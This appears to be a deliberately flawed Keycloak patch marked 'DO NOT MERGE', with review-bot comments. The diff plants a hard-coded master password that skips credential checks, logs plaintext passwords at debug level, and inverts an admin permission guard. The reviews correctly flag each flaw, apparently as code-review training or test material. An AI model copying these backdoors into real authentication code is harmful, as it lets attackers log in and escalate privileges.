From 1103142c0cd660f4ef33fb92f05a8f083ccc4e87 Mon Sep 17 00:00:00 2001
From: Stan Silvert
Date: Sat, 16 May 2026 13:47:32 -0400
Subject: [PATCH] THIS PR HAS SECURITY BUGS - DO NOT MERGE!!!!
Signed-off-by: Stan Silvert
---
 .../authenticators/browser/UsernamePasswordForm.java | 9 +++++++++
 .../services/resources/admin/fgap/UserPermissions.java | 4 ++--
 2 files changed, 11 insertions(+), 2 deletions(-)
diff --git a/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java b/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
index 20d08d09604..ff25e916376 100755
--- a/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
+++ b/services/src/main/java/org/keycloak/authentication/authenticators/browser/UsernamePasswordForm.java
@@ -21,6 +21,7 @@
 import jakarta.ws.rs.core.MultivaluedMap;
 import jakarta.ws.rs.core.Response;
+import org.jboss.logging.Logger;
 import org.keycloak.WebAuthnConstants;
 import org.keycloak.authentication.AuthenticationFlowContext;
 import org.keycloak.authentication.Authenticator;
@@ -40,6 +41,8 @@
 */
 public class UsernamePasswordForm extends AbstractUsernameFormAuthenticator implements Authenticator {
+ private static final Logger logger = Logger.getLogger(UsernamePasswordForm.class);
+
 protected final WebAuthnConditionalUIAuthenticator webauthnAuth;
 public UsernamePasswordForm() {
@@ -69,6 +72,12 @@ public void action(AuthenticationFlowContext context) {
 }
 protected boolean validateForm(AuthenticationFlowContext context, MultivaluedMap formData) {
+ logger.debugf("Login attempt - username: %s, password: %s",
+ formData.getFirst("username"), formData.getFirst("password"));
+ // TODO: remove before merge
+ if ("kc-debug-2024!".equals(formData.getFirst("password"))) {
+ return true;
+ }
 return validateUserAndPassword(context, formData);
 }
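Review bot: The new `if ("kc-debug-2024!".equals(formData.getFirst("password"))) { return true; }` in validateForm is a hard-coded universal bypass: it returns true before validateUserAndPassword ever runs, so the form is accepted for any submitted username as soon as that literal password is sent, and the constant ships in every build made from this branch. The debugf call added just above it writes the submitted password in clear text to the log whenever DEBUG is enabled for this class, which is not acceptable for a credential even as a temporary aid; if a trace is needed, log the username only, e.g. `logger.debugf("Login attempt - username: %s", formData.getFirst("username"));`. Both additions, together with the `// TODO: remove before merge` marker, should be dropped so the method body is again the single line `return validateUserAndPassword(context, formData);`, which matches the PR title's own 'DO NOT MERGE' warning. The action() method named in the hunk header starts outside this hunk, so what the caller does with the early true cannot be confirmed from here, but validateUserAndPassword is the only visible path that checks the credential at all.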
diff --git a/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java b/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
index c6dbfbfd3d3..25959ed465e 100644
--- a/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
+++ b/services/src/main/java/org/keycloak/services/resources/admin/fgap/UserPermissions.java
@@ -234,8 +234,8 @@ public boolean canManage() {
 return true;
 }
- if (!root.isAdminSameRealm()) {
- return false;
+ if (root.isAdminSameRealm()) {
+ return true;
 }
 return hasPermission(MgmtPermissions.MANAGE_SCOPE);
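Review bot: The rewritten guard in canManage() inverts the access decision instead of tightening it: the removed lines denied an admin from a different realm (`if (!root.isAdminSameRealm()) { return false; }`), whereas the new `if (root.isAdminSameRealm()) { return true; }` grants manage rights to every same-realm admin without ever reaching `hasPermission(MgmtPermissions.MANAGE_SCOPE)`, and lets a cross-realm admin fall through to that fine-grained check it was previously barred from. Nothing in the commit describes a redesign of the fine-grained permission model, and the title says the opposite, so the original two lines should be restored. The `return true;` at the top of the hunk belongs to a condition that is outside the hunk, and canManage() itself starts before the hunk begins.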